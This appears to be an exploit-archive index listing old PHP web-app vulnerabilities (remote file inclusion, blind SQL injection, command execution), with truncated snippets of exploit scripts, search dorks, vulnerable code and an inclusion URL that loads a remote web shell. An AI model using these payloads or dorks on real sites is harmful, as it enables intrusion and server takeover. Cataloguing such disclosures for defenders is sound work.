PHPCodeCabinet 0.5 - 'Core.php' Remote File Inclusion

From Minion: PHPCodeCabinet all versions is vulnerable to a remote file include. The vulnerable code is in /include/Beautifier/Core.php an $BEAUTPATH Was not properly scrubbed, so they got owned. Proof of concept:...

SendCard 3.4.0 - Unauthorized Administrative Access

SendCard 3.4.0 - Unauthorized Administrative Access !/usr/bin/php -q -d shortopentag=on php injection\n"; echo " works against magicquotesgpc=Off\n"; echo " 2 - arbitrary remote inclusion\n"; echo " works against allowurlfopen=On\n"; echo " 3 - arbitrary local inclusion\n"; echo " works regardles...

ATutor 1.5.3.1 - 'links' Blind SQL Injection

!/usr/bin/php -q -d shortopentag=on = 4.1 allowing SELECT subqueries for ORDER BY statements see http://dev.mysql.com/doc/refman/5.0/en/subqueries.html - with at least 2 links in atlinks table / if $argc5 echo "Usage: php ".$argv0." host path user pass OPTIONS\r\n"; echo "host: target server...

ATutor <= 1.5.3.1 (links) Remote Blind SQL Injection Exploit

Exploit for unknown platform in category web applications ============================================================ ATutor = 4.1 allowing SELECT subqueries for ORDER BY statements see http://dev.mysql.com/doc/refman/5.0/en/subqueries.html - with at least 2 links in atlinks table / if $argc5 ec...

Mambo Component MGM 0.95r2 - Remote File Inclusion

---------------------------------------------------- Mambo Gallery Manager v095.r3 Remote File Inclusion Vulnerabilities ---------------------------------------------------- Discovered By A-S-T TEAM WE ARE CrAsHoVeRrIdE & BLACK-CODE & MR-HCR ---------------------------------------------------- si...

LinksCaffe 3.0 SQL injection/Command Execution Vulnerabilties

LinksCaffe 3.0 SQL injection/Command Execution Vulnerabilties Produce : LinksCaffe 3.0 Website : http://gonafish.com/ Impact : manupulation of data / system access Discovered by : Simo64 - Moroccan Security Team + SQL injection 1Vulnerable code in line 223 in links.php code : $rime =...

PHP Live! 3.2.1 - help.php Remote File Inclusion

PHP Live! 3.2.1 - help.php Remote File Inclusion Advisory: PHPLive 3.2 Remote Injection Vulnerability Release Date: 2006/07/23 Author: magnific Discovered: aneurysm.inc security reserach Risk: High Vendor Status: not contacted | no patch available Vendor Site: www.osicodes.com Contact:...

pivot130rc2.php.txt

!/usr/bin/php -q -d shortopentag=on ? echo "Pivot = 1.30 RC2 privileges escalation / remote commands execution exploit\n"; echo "by rgod [email protected]\n"; echo "site: http://retrogod.altervista.org\n"; echo "dorks: "Powered byPivot"\n"; echo "version specific: "Powered byPivot - 1.30 RC2"...

Pivot <= 1.30 RC2 Privileges Escalation/Remote Code Execution Exploit

Exploit for unknown platform in category web applications ===================================================================== Pivot = 1.30 RC2 Privileges Escalation/Remote Code Execution Exploit ===================================================================== !/usr/bin/php -q -d...

Pivot 1.30 RC2 - Privilege Escalation Remote Code Execution

Pivot 1.30 RC2 - Privilege Escalation Remote Code Execution !/usr/bin/php -q -d shortopentag=on ? echo "Pivot = 1.30 RC2 privileges escalation / remote commands execution exploit\n"; echo "by rgod [email protected]\n"; echo "site: http://retrogod.altervista.org\n"; echo "dorks: "Powered...

Plume CMS 1.1.3 (dbinstall.php) Remote File Include Vulnerability

No description provided by source. /------------------------------------------------ IHS Public advisory -------------------------------------------------/ Plume CMS Remote File Inclusion It uses PHP and MySql. With a single installation of Plume you can have multiple websites, file management,...

SmartSite CMS 1.0 - &#039;root&#039; Multiple Remote File Inclusions

smartsite cms v1.0 Multiple Remote File include ------------------------------------------------- Discovered By CrAshoVeRrIdE Arabian Security Team ------------------------------------------------- site of script:www.smartsitecms.net ------------------------------------------------- Vulnerable:...

openGuestbook.txt

Produce : Open Guestbook 0.5 Site : http://sourceforge.net/projects/openguestbook Discovred by: Moroccan Security Team Simo64 Greetz to : And All Friends : Details : ========= +Cross Site Scripting -vulnerable code in header.php on line 5 1 2 3 4 5 -------------------- Exploit :...

dreamaccount.txt

---------------------------------------------------- DREAMACCOUNT V3.1 Command Execution Exploit ---------------------------------------------------- Discovered By CrAshoVeRrIdEArabian Security Team Coded By Drago84Exclusive Security Team ---------------------------------------------------- site ...

DreamAccount 3.1 - &#039;auth.api.php&#039; Remote File Inclusion

!/usr/bin/perl use HTTP::Request; use LWP::UserAgent; ---------------------------------------------------- DREAMACCOUNT V3.1 Remote Command Execution Exploit ---------------------------------------------------- Discovered By CrAshoVeRrIdEArabian Security Team Coded By Drago84Exclusive Security Te...

SmartSite CMS 1.0 - root Remote File Inclusion

SmartSite CMS 1.0 - root Remote File Inclusion smartsite cms = 1.0 Remote File Inclusion Contact : irc.gigachat.net ir4dex Risk : High Class : Remote Script : smartsite cms Version : not specified URL: http://www.smartsitecms.net/...

SmartSite CMS 1.0 - &#039;root&#039; Remote File Inclusion

smartsite cms = 1.0 Remote File Inclusion Contact : irc.gigachat.net ir4dex Risk : High Class : Remote Script : smartsite cms Version : not specified URL: http://www.smartsitecms.net/ --------------------------------------------------------------------- Vulnerable code : require$root...

Indexu 5.0.1 - admin_template_path Remote File Inclusion

Indexu 5.0.1 - admintemplatepath Remote File Inclusion indexu remote file include -------------------------------------------------| Discovered By CrAshoVeRrIdE | Arabian Security Team | -------------------------------------------------| site of script:http://www.nicecoder.com/...

Ad Manager Pro 2.6 (ipath) Remote File Include Vulnerability

No description provided by source. Ad Manager Pro 2.6 Remote File Include Vulnerability homepage: phpwebscripts.com Affected files: ad.php and common.php Credit: Basti Vulnerable Code: if $ipath include$ipath.'/common.php'; else include'./common.php'; Example:...

Ad Manager Pro 2.6 - &#039;ipath&#039; Remote File Inclusion

Ad Manager Pro 2.6 Remote File Include Vulnerability homepage: phpwebscripts.com Affected files: ad.php and common.php Credit: Basti Vulnerable Code: if $ipath include$ipath.'/common.php'; else include'./common.php'; Example: http://site/admanagerpro/common.php?ipath=http://site/r57.txt?...